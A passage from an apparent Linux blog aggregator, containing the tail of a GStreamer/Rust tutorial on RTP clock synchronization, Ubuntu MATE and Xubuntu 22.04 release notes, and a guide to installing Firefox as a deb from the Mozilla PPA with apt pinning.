let video_overlay = gst::ElementFactory::make("timeoverlay", None)
    .context("Creating timeoverlay")?;
[...]
video_overlay.set_property_from_str("time-mode", "running-time");

It actually only supports rendering the running time of each buffer, but in a live pipeline with the base time set to zero the running time and pipeline clock time are the same. See the documentation for some more details about the time concepts in GStreamer.

Overall this creates an RTSP stream producer bin, which will also be used in all the following steps.

Receiver

The receiver is a simple playbin pipeline that plays an RTSP URI given via command-line parameters and runs until the stream is finished or an error has happened.

It can be run with the following once the sender is started

$ cargo run -p rtp-rapid-sync-example-recv -- "rtsp://192.168.1.101:8554/test"

Please don’t forget to replace the IP with the IP of the machine that is actually running the server.

All the code should be familiar to anyone who ever wrote a GStreamer application in Rust, except for one part that might need a bit more explanation

pipeline.connect_closure(
    "source-setup",
    false,
    glib::closure!(|_playbin: &gst::Pipeline, source: &gst::Element| {
        source.set_property("latency", 40u32);
    }),
);

playbin is going to create an rtspsrc, and at that point it will emit the source-setup signal so that the application can do any additional configuration of the source element. Here we’re connecting a signal handler to that signal to do exactly that.

By default rtspsrc introduces 2 seconds of latency, which is a lot more than is usually needed. For live, non-VOD RTSP streams this value should be around the network jitter, and here we’re configuring it to 40 milliseconds.

Retrieval of absolute sender clock times

Now as the first step we’re going to retrieve the absolute sender clock times for each video frame on the receiver. They will be rendered by the receiver at the bottom of each video frame and will also be printed to stdout. The changes between the previous version of the code and this version can be seen here and the final code here in the sender-clock-time-retrieval branch.

When running the sender and receiver as before, the video from the receiver shows two rendered clock times.

The upper time that is rendered on the video frames is rendered by the sender, the bottom time is rendered by the receiver and both should always be the same unless something is broken here. Both times are the pipeline clock time when the sender created/captured the video frame.

In this configuration the absolute clock times of the sender are provided to the receiver via the NTP / RTP timestamp mapping in the RTCP Sender Reports. That’s also the reason why it takes about 5s for the receiver to know the sender’s clock time: RTCP packets are not scheduled very often, by default only about every 5s. The RTCP interval can be configured on rtpbin together with many other things.
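As an illustrative sketch (not part of the example code): one way to lower the RTCP interval is to fetch rtpbin’s internal RTPSession object and reduce its rtcp-min-interval property. The session id 0 and the one-second value below are assumptions for this sketch; rtpbin is assumed to be the sender’s rtpbin element.

// Sketch: retrieve the internal session object for session 0 from rtpbin
// and lower the minimum RTCP interval (the value is in nanoseconds).
let session = rtpbin.emit_by_name::<glib::Object>("get-internal-session", &[&0u32]);
session.set_property("rtcp-min-interval", 1_000_000_000u64);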

Sender

On the sender-side the configuration changes are rather small and not even absolutely necessary.

rtpbin.set_property_from_str("ntp-time-source", "clock-time");

By default the RTP NTP time used in the RTCP packets is based on the local machine’s walltime clock converted to the NTP epoch. While this works fine, this is not the clock that is used for synchronizing the media and as such there will be drift between the RTP timestamps of the media and the NTP time from the RTCP packets, which will be reset every time the receiver receives a new RTCP Sender Report from the sender.

Instead, we configure rtpbin here to use the pipeline clock as the source for the NTP timestamps used in the RTCP Sender Reports. This doesn’t give us (by default at least, see later) an actual NTP timestamp but it doesn’t have the drift problem mentioned before. Without further configuration, in this pipeline the used clock is the monotonic system clock.

rtpbin.set_property("rtcp-sync-send-time", false);

rtpbin normally uses the time when a packet is sent out for the NTP / RTP timestamp mapping in the RTCP Sender Reports. This is changed with this property to instead use the time when the video frame / audio sample was captured, i.e. it does not include all the latency introduced by encoding and other processing in the sender pipeline.

This doesn’t make any big difference in this scenario but usually one would be interested in the capture clock times and not the send clock times.

Receiver

On the receiver side there are a few more changes. First of all we have to opt in to rtpjitterbuffer putting reference timestamp metadata on every received packet with the sender’s absolute clock time.

pipeline.connect_closure(
    "source-setup",
    false,
    glib::closure!(|_playbin: &gst::Pipeline, source: &gst::Element| {
        source.set_property("latency", 40u32);
        source.set_property("add-reference-timestamp-meta", true);
    }),
);

rtpjitterbuffer will start putting the metadata on packets once it knows the NTP / RTP timestamp mapping, i.e. after the first RTCP Sender Report is received in this case. Between the Sender Reports it is going to interpolate the clock times. The normal timestamps (PTS) on each packet are not affected by this and are still based on whatever clock is used locally by the receiver for synchronization.

To actually make use of the reference timestamp metadata we add a timeoverlay element as video-filter on the receiver:

let timeoverlay =
    gst::ElementFactory::make("timeoverlay", None).context("Creating timeoverlay")?;

timeoverlay.set_property_from_str("time-mode", "reference-timestamp");
timeoverlay.set_property_from_str("valignment", "bottom");

pipeline.set_property("video-filter", &timeoverlay);

This will then render the sender’s absolute clock times at the bottom of each video frame, as seen in the screenshot above.

And last we also add a pad probe on the sink pad of the timeoverlay element to retrieve the reference timestamp metadata of each video frame and print the sender’s clock time to stdout:

let sinkpad = timeoverlay
    .static_pad("video_sink")
    .expect("Failed to get timeoverlay sinkpad");
sinkpad
    .add_probe(gst::PadProbeType::BUFFER, |_pad, info| {
        if let Some(gst::PadProbeData::Buffer(ref buffer)) = info.data {
            if let Some(meta) = buffer.meta::<gst::ReferenceTimestampMeta>() {
                println!("Have sender clock time {}", meta.timestamp());
            } else {
                println!("Have no sender clock time");
            }
        }

        gst::PadProbeReturn::Ok
    })
    .expect("Failed to add pad probe");

Rapid synchronization via RTP header extensions

The main problem with the previous code is that the sender’s clock times are only known once the first RTCP Sender Report is received by the receiver. There are many ways to configure rtpbin to make this happen faster (e.g. by reducing the RTCP interval or by switching to the AVPF RTP profile) but in any case the information would be transmitted outside the actual media data flow, and it can’t be guaranteed that it is known on the receiver from the very first received packet onwards. This is of course not a problem in every use-case, but for the cases where it is, there is a solution.

RFC 6051 defines an RTP header extension that allows transmitting the NTP timestamp corresponding to an RTP packet directly together with that very packet. And that’s what the next changes to the code make use of.

The changes between the previous version of the code and this version can be seen here and the final code here in the rapid-synchronization branch.

Sender

To add the header extension on the sender-side it is only necessary to add an instance of the corresponding header extension implementation to the payloaders.

let hdr_ext = gst_rtp::RTPHeaderExtension::create_from_uri(
    "urn:ietf:params:rtp-hdrext:ntp-64",
)
.context("Creating NTP 64-bit RTP header extension")?;
hdr_ext.set_id(1);
video_pay.emit_by_name::<()>("add-extension", &[&hdr_ext]);

This first instantiates the header extension based on the uniquely defined URI for it, then sets its ID to 1 (see RFC 5285) and then adds it to the video payloader. The same is then done for the audio payloader, as sketched below.
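For reference, the audio side might look as follows; this is a sketch assuming audio_pay is the Opus payloader created earlier in the sender pipeline (not shown in the snippets here):

// Sketch: the same NTP 64-bit header extension, added to the audio payloader.
// `audio_pay` is assumed to be the rtpopuspay element from the sender pipeline.
let hdr_ext = gst_rtp::RTPHeaderExtension::create_from_uri(
    "urn:ietf:params:rtp-hdrext:ntp-64",
)
.context("Creating NTP 64-bit RTP header extension")?;
// Extension IDs are scoped per stream, so ID 1 can be used again here.
hdr_ext.set_id(1);
audio_pay.emit_by_name::<()>("add-extension", &[&hdr_ext]);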

By default this will add the header extension to every RTP packet that has a different RTP timestamp than the previous one. In other words: on the first packet that corresponds to an audio or video frame. Via properties on the header extension this can be configured but generally the default should be sufficient.

Receiver

On the receiver-side no changes would actually be necessary. The use of the header extension is signaled via the SDP (see RFC 5285) and it will be automatically made use of inside rtpbin as another source of NTP / RTP timestamp mappings in addition to the RTCP Sender Reports.

However, we configure one additional property on rtpbin

source.connect_closure(
    "new-manager",
    false,
    glib::closure!(|_rtspsrc: &gst::Element, rtpbin: &gst::Element| {
        rtpbin.set_property("min-ts-offset", gst::ClockTime::from_mseconds(1));
    }),
);

Inter-stream audio/video synchronization

The reason for configuring the min-ts-offset property on the rtpbin is that the NTP / RTP timestamp mapping is not only used for providing the reference timestamp metadata but it is also used for inter-stream synchronization by default. That is, for getting correct audio / video synchronization.

With RTP alone there is no mechanism to synchronize multiple streams against each other, as the RTP timestamps of different streams have no correlation to each other. This is not too big a problem, as usually the packets for audio and video are received approximately at the same time, but there’s still some inaccuracy in there.

One approach to fix this is to use the NTP / RTP timestamp mapping for each stream, either from the RTCP Sender Reports or from the RTP header extension, and that’s what is made use of here. And because the mapping is provided very often via the RTP header extension, but the RTP timestamps are only accurate up to the clock rate (1/90000s for video and 1/48000s for audio in this case), we configure a threshold of 1ms for adjusting the inter-stream synchronization. Without this it would be adjusted almost continuously by a very small amount back and forth.

Other approaches for inter-stream synchronization are provided by RTSP itself before streaming starts (via the RTP-Info header), but due to a bug this is currently not made use of by GStreamer.

Yet another approach would be via the clock information provided by RFC 7273, about which I already wrote previously and which is also supported by GStreamer. This also allows inter-device, network synchronization and is used for that purpose as part of e.g. AES67, Ravenna, SMPTE 2022 / 2110 and many other protocols.

Inter-device network synchronization

Now for the last part, we’re going to add actual inter-device synchronization to this example. The changes between the previous version of the code and this version can be seen here and the final code here in the network-sync branch. This does not use the clock information provided via RFC 7273 (which would be another option) but uses the same NTP / RTP timestamp mapping that was discussed above.

When starting the receiver multiple times on different (or the same) machines, each of them should play back the media synchronized to each other and exactly 2 seconds after the corresponding audio / video frames are produced on the sender.

For this, both the sender and all receivers are using an NTP clock (pool.ntp.org in this case) instead of the local monotonic system clock for media synchronization (i.e. as the pipeline clock). Instead of an NTP clock it would also be possible to use any other mechanism for network clock synchronization, e.g. PTP or the GStreamer netclock.

println!("Syncing to NTP clock");
clock
    .wait_for_sync(gst::ClockTime::from_seconds(5))
    .context("Syncing NTP clock")?;
println!("Synced to NTP clock");

This code instantiates a GStreamer NTP clock and then synchronously waits up to 5 seconds for it to synchronize. If that fails then the application simply exits with an error.

Sender

On the sender side all that is needed is to configure the RTSP media factory, and as such the pipeline used inside it, to use the NTP clock

factory.set_clock(Some(&clock));

This causes all media inside the sender’s pipeline to be synchronized according to this NTP clock and to also use it for the NTP timestamps in the RTCP Sender Reports and the RTP header extension.

Receiver

On the receiver side the same has to happen

pipeline.use_clock(Some(&clock));

In addition a couple more settings have to be configured on the receiver though. First of all we configure a static latency of 2 seconds on the receiver’s pipeline.

pipeline.set_latency(gst::ClockTime::from_seconds(2));

This is necessary as GStreamer can’t know the latency of every receiver (e.g. different decoders might be used), and also because the sender latency can’t be automatically known. Each audio / video frame will be timestamped on the receiver with the NTP timestamp when it was captured / created, but since then all the latency of the sender, the network and the receiver pipeline has passed and for this some compensation must happen.

Which value to use here depends a lot on the overall setup, but 2 seconds is a (very) safe guess in this case. The value only has to be larger than the sum of sender, network and receiver latency and in the end has the effect that the receiver is showing the media exactly that much later than the sender has produced it.

And last we also have to tell rtpbin that

  1. the sender and receiver clocks are synchronized to each other, i.e. in this case both are using exactly the same NTP clock, so no translation to the pipeline’s clock is necessary, and
  2. the outgoing timestamps on the receiver should be exactly the sender timestamps, with the conversion happening based on the NTP / RTP timestamp mapping

source.set_property_from_str("buffer-mode", "synced");
source.set_property("ntp-sync", true);

And that’s it.

A careful reader will also have noticed that all of the above would also work without the RTP header extension, but then the receivers would only be synchronized once the first RTCP Sender Report is received. That’s what the test-netclock.c / test-netclock-client.c example from the GStreamer RTSP server is doing.

As usual with RTP, the above is by far not the only way of doing this and GStreamer also supports various other synchronization mechanisms. Which one is the correct one for a specific use-case depends on a lot of factors.

on May 02, 2022 01:00 PM

April 26, 2022

Ubuntu MATE 22.04 LTS is the culmination of 2 years of continual improvement 😅 to Ubuntu and MATE Desktop. As is tradition, the LTS development cycle has a keen focus on eliminating paper 🧻 cuts 🔪 but we’ve jammed in some new features and a fresh coat of paint too 🖌 The following is a summary of what’s new since Ubuntu MATE 21.10 and some reminders of how we got here from 20.04. Read on to learn more 🧑‍🎓

Thank you! 🙇

I’d like to extend my sincere thanks to everyone who has played an active role in improving Ubuntu MATE for this LTS release 👏 From reporting bugs, submitting translations, providing patches, contributing to our crowd funding, developing new features, creating artwork, offering community support, actively testing and providing QA feedback to writing documentation or creating this fabulous website. Thank you! Thank you all for getting out there and making a difference! 💚

Ubuntu MATE 22.04 LTS (Jammy Jellyfish) - Mutiny layout with Yaru-MATE-dark

What’s changed?

Here are the highlights of what’s changed recently.

MATE Desktop 1.26.1 🧉

Ubuntu MATE 22.04 features MATE Desktop 1.26.1. MATE Desktop 1.26.0 was introduced in 21.10 and benefits from significant effort 😅 in fixing bugs 🐛 in MATE Desktop, optimising performance ⚡ and plugging memory leaks. MATE Desktop 1.26.1 addresses the bugs we discovered following the initial 1.26.0 release. Our community also fixed some bugs in Plank and Brisk Menu 👍 and repaired the screen reader during installs for visually impaired users 🥰 In all, over 500 bugs have been addressed in this release 🩹

Yaru 🎨

Ubuntu MATE 21.04 was the first release to ship with a MATE variant of the Yaru theme. A year later and we’ve been working hard with members of the Yaru and Ubuntu Desktop teams to bring full MATE compatibility to upstream Yaru, including all the accent colour varieties. All reported bugs 🐞 in the Yaru implementation for MATE have also been fixed 🛠

Yaru Themes in Ubuntu MATE 22.04 LTS

Ubuntu MATE 22.04 LTS ships with all the Yaru themes, including our own “chelsea cucumber” version 🥒 The legacy Ambiant/Radiant themes are no longer installed by default and neither are the stock MATE Desktop themes. We’ve added an automatic settings migration to transition users who upgrade to an appropriate Yaru MATE theme.

Cherries on top 🍒

In collaboration with Paul Kepinski 🇫🇷 (Yaru team) and Marco Trevisan 🇮🇹 (Ubuntu Desktop team) we’ve added dark/light panels and panel icons to Yaru for MATE Desktop and Unity. I’ve added a collection of new dark/light panel icons to Yaru for popular apps with indicators such as Steam, Dropbox, uLauncher, RedShift, Transmission, Variety, etc.

Light and Dark panels

I’ve added patches 🩹 to the Appearance Control Center that apply theme changes to Plank (the dock) and Pluma (text editor), and correctly toggle the colour scheme preference for GNOME 42 apps. When you choose a dark theme, everything goes dark in unison 🥷 and vice versa.

So, Ubuntu MATE 22.04 LTS is now using everything Yaru/Suru has to offer. 🎉

AI Generated wallpapers

My friend Simon Butcher 🇬🇧 is Head of Research Platforms at Queen Mary University of London, managing the Apocrita HPC cluster service. He’s been creating AI 🤖 generated art using bleeding edge CLIP guided diffusion models 🖌 The results are pretty incredible, and we’ve included the 3 top-voted “Jammy Jellyfish” in our wallpaper selection, as their vivid and vibrant styles complement the Yaru accent colour theme options very nicely indeed 😎

If you want the complete set, here’s a tarball of all 8 wallpapers at 3840x2160:

Ubuntu MATE stuff 🧉

Ubuntu MATE has a few distinctive apps and integrations of its own; here’s a rundown of what’s new and shiny ✨

MATE Tweak

Switching layouts with MATE Tweak is its most celebrated feature. We’ve improved the reliability of desktop layout switching and restoring custom layouts is now 100% accurate 💯

Having your desktop your way in Ubuntu MATE

We’ve removed mate-netbook from the default installation of Ubuntu MATE and as a result the Netbook layout is no longer available. We did this because mate-maximus, a component of mate-netbook, is the cause of some compatibility issues with client side decorated (CSD) windows. There are still several panel layouts that offer efficient resolution use 📐 for those who need it.

MATE Tweak has refreshed its support for 3rd party compositors. Support for Compton has been dropped, as it is no longer actively maintained, and comprehensive support for picom has been added. picom offers three compositor options: Xrender, GLX and Hybrid. All three can be selected via MATE Tweak, as the performance and compatibility of each varies depending on your hardware. Some people choose picom because they get better gaming performance or reduced screen tearing. Some just like the subtle animation effects picom adds 💖

MATE HUD

Recent versions of rofi, the tool used by MATE HUD to visualise menu searches, have a new theme system. MATE HUD has been updated to support this new theme engine and comes with two MATE-specific themes (mate-hud and mate-hud-rounded) that automatically adapt to match the currently selected GTK theme.

You can add your own rofi themes to ~/.local/share/rofi/themes. Should you want to, you can use any rofi theme in MATE HUD. Use Alt + F2 to run rofi-theme-selector to try out the different themes, and if there is one you prefer you can set it as the default by running the following in a terminal:

gsettings set org.mate.hud rofi-theme <theme name>
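For example, to make the rounded MATE theme mentioned above the default:

gsettings set org.mate.hud rofi-theme mate-hud-rounded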

MATE HUD uses the new rofi theme engine

Windows & Shadows

I’ve updated the Metacity/Marco (the MATE Window Manager) themes in Yaru to make sure they match GNOME/CSD/Handy windows, for a consistent look and feel across all window types 🪟 and 3rd party compositors like picom. I even patched how Marco and picom render shadows, so that windows look cohesive regardless of the toolkit or compositor being used.

Ubuntu MATE Welcome & Boutique

The Software Boutique has been restocked with software for 22.04, and Firefox 🔥🦊 ESR (.deb) has been added to the Browser Ballot in Ubuntu MATE Welcome.

Comprehensive browser options just a click away

41% less fat 🍩

Ubuntu MATE, like its lead developer, was starting to get a bit large around the midsection 😊 During the development of 22.04, the image 📀 got to 4.1GB 😮

So, we put Ubuntu MATE on a strict diet 🥗 We’ve removed the proprietary NVIDIA drivers from the local apt pool on the install media, migrated fully to Yaru (which now features excellent de-duplication of icons), and removed our legacy themes/icons. And now that the Yaru-MATE themes/icons are completely in upstream Yaru, we were able to remove 3 snaps from the default install. The image is now a much more reasonable 2.7GB; 41% smaller 🗜

This is important to us, because the majority of our users are in countries where Internet bandwidth is not always plentiful. Those of you with NVIDIA GPUs, don’t worry. If you tick the 3rd party software and drivers during the install the appropriate driver for your GPU will be downloaded and installed 👍

NVIDIA GPU owners should tick Install 3rd party software and drivers during install

While investigating 🕵 a bug in Xorg Server that caused Marco (the MATE window manager) to crash, we discovered that Marco has lower frame time latency ⏱ when using Xrender with the NVIDIA proprietary drivers. We’ve published a PPA where NVIDIA GPU users can install a version of Marco that uses Xpresent for optimal performance:

sudo apt-add-repository ppa:ubuntu-mate-dev/marco
sudo apt upgrade

Should you want to revert this change, install ppa-purge and run the following from a terminal: sudo ppa-purge -o ubuntu-mate-dev -p marco.

But wait! There’s more! 😲

These reductions in size come even after we added three new applications to the default install of Ubuntu MATE: GNOME Clocks, Maps and Weather. My family and I 👨‍👩‍👧 have found these applications particularly useful and use them regularly on our laptops, without having to reach for a phone or tablet.

GNOME Clocks, Maps & Weather New additions to the default desktop application in Ubuntu MATE 22.04 LTS

For those of you who like a minimal base platform, the minimal install option is still available; it delivers just the essential Ubuntu MATE Desktop and Firefox browser. You can then build up from there 👷

Packages, packages, packages 📦

It doesn’t matter how you like to consume your Linux 🐧 packages, Ubuntu MATE has got you covered with PPA, Snap, AppImage and FlatPak support baked in by default. You’ll find flatpak, snapd and xdg-desktop-portal-gtk (to support Snap and FlatPak) and the (ageing) libfuse2 (to support AppImage) all pre-installed.

Although flatpak is installed, FlatHub is not enabled by default. To enable FlatHub run the following in a terminal:

flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo
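Once FlatHub is enabled, installing an app is a one-liner; GNOME Calculator is used here purely as an illustration:

flatpak install flathub org.gnome.Calculator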

We’ve also included snapd-desktop-integration which provides a bridge between the user’s session and snapd to integrate theme preferences 🎨 with snapped apps and can also automatically install snapped themes 👔 All the Yaru themes shipped in Ubuntu MATE are fully snap aware.

Ayatana Indicators

Ubuntu MATE 20.10 transitioned to Ayatana Indicators 🚥 As a quick refresher, Ayatana Indicators are a fork of Ubuntu Indicators that aim to be cross-distro compatible and re-usable for any desktop environment 👌

Ubuntu MATE 22.04 LTS comes with Ayatana Indicators 22.2.0 and sees the return of Messages Indicator 📬 to the default install. Ayatana Indicators now provide improved backwards compatibility with Ubuntu Indicators and no longer require the installation of two sets of libraries, saving RAM and CPU cycles and improving battery endurance 🔋

Ayatana Indicators Settings

To complement the BlueZ 5.64 protocol stack in Ubuntu, Ubuntu MATE ships Blueman 2.2.4, which offers comprehensive management of Bluetooth devices and much improved pairing compatibility 💙🦷

I also patched mate-power-manager, ayatana-indicator-power and Yaru to add support for battery powered gaming input devices, such as controllers 🎮 and joysticks 🕹

Active Directory

And in case you missed it, the Ubuntu Desktop team added the option to enroll your computer into an Active Directory domain 🔑 during install. Ubuntu MATE has supported the same capability since it was first made available in the 20.10 release.

Raspberry Pi image 🥧

  • Should be available very shortly after the release of 22.04.

Major Applications

Accompanying MATE Desktop 1.26.1 and Linux 5.15 are Firefox 99.0, Celluloid 0.20, Evolution 3.44 & LibreOffice 7.3.2.1.

See the Ubuntu 22.04 Release Notes for details of all the changes and improvements that Ubuntu MATE benefits from.

Download Ubuntu MATE 22.04 LTS

This new release will be first available for PC/Mac users.

Download

Upgrading from Ubuntu MATE 20.04 LTS and 21.10

You can upgrade to Ubuntu MATE 22.04 LTS from either Ubuntu MATE 20.04 LTS or 21.10. Ensure that you have all updates installed for your current version of Ubuntu MATE before you upgrade.

  • Open the “Software & Updates” from the Control Center.
  • Select the 3rd Tab called “Updates”.
  • Set the “Notify me of a new Ubuntu version” drop down menu to “For long-term support versions” if you are using 20.04 LTS; set it to “For any new version” if you are using 21.10.
  • Press Alt+F2 and type in update-manager -c -d into the command box.
  • Update Manager should open up and tell you: New distribution release ‘XX.XX’ is available.
    • If not, you can use /usr/lib/ubuntu-release-upgrader/check-new-release-gtk
  • Click “Upgrade” and follow the on-screen instructions.
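Alternatively, you can start the upgrade from a terminal with Ubuntu’s standard CLI upgrader (note: upgrades from 20.04 LTS are only offered by default once the first 22.04 point release is out; -d forces the check before then):

sudo do-release-upgrade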

There are no offline upgrade options for Ubuntu MATE. Please ensure you have network connectivity to one of the official mirrors or to a locally accessible mirror and follow the instructions above.

Known Issues

Here are the known issues.

Component: Ubuntu
Problem: Ubiquity slideshows are missing for OEM installs of Ubuntu MATE

Feedback

Is there anything you can help with or want to be involved in? Maybe you just want to discuss your experiences or ask the maintainers some questions. Please come and talk to us.

on April 26, 2022 04:47 PM

April 23, 2022

It is now widely known that Ubuntu 22.04 LTS (Jammy Jellyfish) ships Firefox as a snap, but some people (like me) may prefer installing it from .deb packages to retain control over upgrades or to keep extensions working.

Luckily there is still a PPA serving firefox (and thunderbird) debs at https://launchpad.net/~mozillateam/+archive/ubuntu/ppa maintained by the Mozilla Team. (Thank you!)

You can block the Ubuntu archive’s version that just pulls in the snap by pinning it:

$ cat /etc/apt/preferences.d/firefox-no-snap 
Package: firefox*
Pin: release o=Ubuntu*
Pin-Priority: -1
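Before installing the deb, you can confirm the pin is in effect with apt policy; the version from the Ubuntu archive (the snap transition package) should show a priority of -1:

apt policy firefox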

Now you can remove the transitional package and the Firefox snap itself:

sudo apt purge firefox
sudo snap remove firefox
sudo add-apt-repository ppa:mozillateam/ppa
sudo apt update
sudo apt install firefox

Since the package comes from a PPA, unattended-upgrades will not upgrade it automatically unless you enable this origin:

echo 'Unattended-Upgrade::Allowed-Origins:: "LP-PPA-mozillateam:${distro_codename}";' | sudo tee /etc/apt/apt.conf.d/51unattended-upgrades-firefox
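To verify that unattended-upgrades now picks up the PPA, a dry run helps:

sudo unattended-upgrade --dry-run --debug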

Happy browsing!

Update: I have found a few other, similar guides at https://fostips.com/ubuntu-21-10-two-firefox-remove-snap and https://ubuntuhandbook.org/index.php/2022/04/install-firefox-deb-ubuntu-22-04 and I’ve updated the pinning configuration based on them.

on April 23, 2022 02:38 PM

April 21, 2022

The Xubuntu team is happy to announce the immediate release of Xubuntu 22.04.

Xubuntu 22.04, codenamed Jammy Jellyfish, is a long-term support (LTS) release and will be supported for 3 years, until 2025.

The Xubuntu and Xfce development teams have made great strides in usability, expanded features, and additional applications in the last two years. Users coming from 20.04 will be delighted with improvements found in Xfce 4.16 and our expanded application set. 21.10 users will appreciate the added stability that comes from the numerous maintenance releases that landed this cycle.

The final release images are available as torrents and direct downloads from xubuntu.org/download/.

As the main server might be busy in the first few days after the release, we recommend using the torrents if possible.

Xubuntu Core, our minimal ISO edition, is available to download from unit193.net/xubuntu/core/ [torrent]. Find out more about Xubuntu Core here.

We’d like to thank everybody who contributed to this release of Xubuntu!

Highlights and Known Issues

Highlights

  • Mousepad 0.5.8, our text editor, broadens its feature set with the addition of session backup and restore, plugin support, and a new gspell plugin.
  • Ristretto 0.12.2, the versatile image viewer, improves thumbnail support and features numerous performance improvements.
  • Whisker Menu Plugin 2.7.1 expands customization options with several new preferences and CSS classes for theme developers.
  • Firefox is now included as a Snap package.
  • Refreshed user documentation, available on the ISO and online.
  • Six new wallpapers from the 22.04 Community Wallpaper Contest.

Known Issues

  • The shutdown prompt may not be displayed at the end of the installation. Instead you might just see a Xubuntu logo, a black screen with an underscore in the upper left hand corner, or just a black screen. Press Enter and the system will reboot into the installed environment. (LP: #1944519)
  • The Firefox Snap is not currently able to open the locally-installed Xubuntu Docs. (LP: #1967109)

For more obscure known issues, information on affecting bugs, bug fixes, and a list of new package versions, please refer to the Xubuntu Release Notes.

The main Ubuntu Release Notes cover many of the other packages we carry and more generic issues.

Support

For support with the release, navigate to Help & Support for a complete list of methods to get help.

on April 21, 2022 10:44 PM